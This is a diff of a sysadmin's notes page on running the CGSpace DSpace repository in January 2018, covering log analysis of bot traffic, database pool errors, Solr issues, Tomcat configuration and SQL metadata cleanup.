      2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
       
      • And there are many of these errors every day for the past month:
      -
      $ grep -c "Error while searching for sidebar facets" dspace.log.*
      +
      $ grep -c "Error while searching for sidebar facets" dspace.log.*
       dspace.log.2017-11-21:4
       dspace.log.2017-11-22:1
       dspace.log.2017-11-23:4
      @@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
       
    • I woke up to more up and down of CGSpace, this time UptimeRobot noticed a few rounds of up and down of a few minutes each and Linode also notified of high CPU load from 12 to 2 PM
    • Looks like I need to increase the database pool size again:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
     
    • The active IPs in XMLUI are:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         607 40.77.167.141
         611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
         663 188.226.169.37
    @@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
     
  • This appears to be the Internet Archive’s open source bot
  • They seem to be re-using their Tomcat session so I don’t need to do anything to them just yet:
  • -
    $ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2
     
    • The API logs show the normal users:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          32 207.46.13.182
          38 40.77.167.132
          38 68.180.229.254
    @@ -361,7 +361,7 @@ dspace.log.2018-01-03:1909
     
    • But they come from hundreds of IPs, many of which are 54.x.x.x:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
           9 54.144.87.92
           9 54.146.222.143
           9 54.146.249.249
    @@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
     
  • CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot last night
  • The XMLUI logs show this activity:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "4/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "4/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         968 197.211.63.81
         981 213.55.99.121
        1039 66.249.64.93
    @@ -421,7 +421,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
    • So for this week that is the number one problem!
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
     
  • Peter said that CGSpace was down last night and Tsega restarted Tomcat
  • I don’t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:
  • -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
     
  • Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space
  • I had a look and there is one Apache 2 log file that is 73GB, with lots of this:
  • -
    [Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for "9-16-1-RV.doc" in "/home/files/journals/6//articles/9/". Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
    +
    [Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for "9-16-1-RV.doc" in "/home/files/journals/6//articles/9/". Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
     
    • I will delete the log file for now and tell Danny
    • Also, I’m still seeing a hundred or so of the “ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer” errors in dspace logs, I need to search the dspace-tech mailing list to see what the cause is
    • I will run a full Discovery reindex in the mean time to see if it’s something wrong with the Discovery Solr core
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
     
     real    110m43.985s
    @@ -465,7 +465,7 @@ sys     3m14.890s
     
    • I’m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:
    -
    org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered " "]" "] "" at line 1, column 32.
    +
    org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered " "]" "] "" at line 1, column 32.
     
    • I posted a message to the dspace-tech mailing list to see if anyone can help
    @@ -474,7 +474,7 @@ sys 3m14.890s
  • Advise Sisay about blank lines in some IITA records
  • Generate a list of author affiliations for Peter to clean up:
  • -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 4515
     

    2018-01-10

      @@ -553,10 +553,10 @@ Caused by: org.apache.http.client.ClientProtocolException
    • I can apparently search for records in the Solr stats core that have an empty owningColl field using this in the Solr admin query: -owningColl:*
    • On CGSpace I see 48,000,000 records that have an owningColl field and 34,000,000 that don’t:
    -
    $ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&wt=json&indent=true' | grep numFound 
    -  "response":{"numFound":48476327,"start":0,"docs":[
    -$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":34879872,"start":0,"docs":[
    +
    $ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&wt=json&indent=true' | grep numFound 
    +  "response":{"numFound":48476327,"start":0,"docs":[
    +$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":34879872,"start":0,"docs":[
     
    • I tested the dspace stats-util -s process on my local machine and it failed the same way
    • It doesn’t seem to be helpful, but the dspace log shows this:
    • @@ -568,12 +568,12 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=js
    • Uptime Robot said that CGSpace went down at around 9:43 AM
    • I looked at PostgreSQL’s pg_stat_activity table and saw 161 active connections, but no pool errors in the DSpace logs:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-10 
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-10 
     0
     
    • The XMLUI logs show quite a bit of activity today:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         951 207.46.13.159
         954 157.55.39.123
        1217 95.108.181.88
    @@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=js
     
    • The user agent for the top six or so IPs are all the same:
    -
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
    +
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
     
    • whois says they come from Perfect IP
    • I’ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:
    -
    $ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                                                                                                                                  
    +
    $ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                                                                                                                                  
     49096
     
    • Rather than blocking their IPs, I think I might just add their user agent to the “badbots” zone with Baidu, because they seem to be the only ones using that user agent:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
    -/537.36" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
    +/537.36" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        6796 70.36.107.50
       11870 70.36.107.190
       17323 70.36.107.49
    @@ -637,19 +637,19 @@ cache_alignment : 64
     
  • Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates
  • Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat localhost_access_log at the time of my sharding attempt on my test machine:
  • -
    127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-18YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 447
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 76
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 2137630
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16253
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    +
    127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-18YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 447
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 76
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 2137630
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16253
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
     
    • The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error
    • This is apparently a common Solr error code that means “version conflict”: http://yonik.com/solr/optimistic-concurrency/
    • Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
       21572 70.36.107.50
       30722 70.36.107.190
       34566 70.36.107.49
    @@ -659,18 +659,18 @@ cache_alignment : 64
     
    • Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat’s server.xml:
    -
    <Resource name="jdbc/dspaceWeb" auth="Container" type="javax.sql.DataSource"
    -          driverClassName="org.postgresql.Driver"
    -          url="jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb"
    -          username="dspace"
    -          password="dspace"
    -          initialSize='5'
    -          maxActive='75'
    -          maxIdle='15'
    -          minIdle='5'
    -          maxWait='5000'
    -          validationQuery='SELECT 1'
    -          testOnBorrow='true' />
    +
    <Resource name="jdbc/dspaceWeb" auth="Container" type="javax.sql.DataSource"
    +          driverClassName="org.postgresql.Driver"
    +          url="jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb"
    +          username="dspace"
    +          password="dspace"
    +          initialSize='5'
    +          maxActive='75'
    +          maxIdle='15'
    +          minIdle='5'
    +          maxWait='5000'
    +          validationQuery='SELECT 1'
    +          testOnBorrow='true' />
     
    • So theoretically I could name each connection “xmlui” or “dspaceWeb” or something meaningful and it would show up in PostgreSQL’s pg_stat_activity table!
    • This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)
    • @@ -686,16 +686,16 @@ cache_alignment : 64
    • I’m looking at the DSpace 6.0 Install docs and notice they tweak the number of threads in their Tomcat connector:
    <!-- Define a non-SSL HTTP/1.1 Connector on port 8080 -->
    -<Connector port="8080"
    -           maxThreads="150"
    -           minSpareThreads="25"
    -           maxSpareThreads="75"
    -           enableLookups="false"
    -           redirectPort="8443"
    -           acceptCount="100"
    -           connectionTimeout="20000"
    -           disableUploadTimeout="true"
    -           URIEncoding="UTF-8"/>
    +<Connector port="8080"
    +           maxThreads="150"
    +           minSpareThreads="25"
    +           maxSpareThreads="75"
    +           enableLookups="false"
    +           redirectPort="8443"
    +           acceptCount="100"
    +           connectionTimeout="20000"
    +           disableUploadTimeout="true"
    +           URIEncoding="UTF-8"/>
     
    • In Tomcat 8.5 the maxThreads defaults to 200 which is probably fine, but tweaking minSpareThreads could be good
    • I don’t see a setting for maxSpareThreads in the docs so that might be an error
    • @@ -711,8 +711,8 @@ cache_alignment : 64
    • Still testing DSpace 6.2 on Tomcat 8.5.24
    • Catalina errors at Tomcat 8.5 startup:
    -
    13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of "35" for "maxActive" property, which is being ignored.
    -13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of "5000" for "maxWait" property, which is being ignored.
    +
    13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of "35" for "maxActive" property, which is being ignored.
    +13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of "5000" for "maxWait" property, which is being ignored.
     
    • I looked in my Tomcat 7.0.82 logs and I don’t see anything about DBCP2 errors, so I guess this a Tomcat 8.0.x or 8.5.x thing
    • DBCP2 appears to be Tomcat 8.0.x and up according to the Tomcat 8.0 migration guide
    • @@ -761,15 +761,15 @@ Caused by: java.lang.NullPointerException
    • Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload
    • I’m going to apply these ~130 corrections on CGSpace:
    -
    update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
    -update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
    -update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
    -update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
    -update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
    -update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
    -update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
    +
    update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
    +update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
    +update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
    +update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
    +update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
    +update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
    +update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
     
    • Continue proofing Peter’s author corrections that I started yesterday, faceting on non blank, non flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names
    @@ -777,17 +777,17 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and -
    $ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p 'fuuu'
     
    • In looking at some of the values to delete or check I found some metadata values that I could not resolve their handle via SQL:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
      metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
     -------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
                2757936 |        4369 |                 3 | Tarawali   |           |     9 |           |        600 |                2
     (1 row)
     
    -dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
    +dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
      handle
     --------
     (0 rows)
    @@ -796,7 +796,7 @@ dspace=# select handle from item, handle where handle.resource_id = item.item_id
     
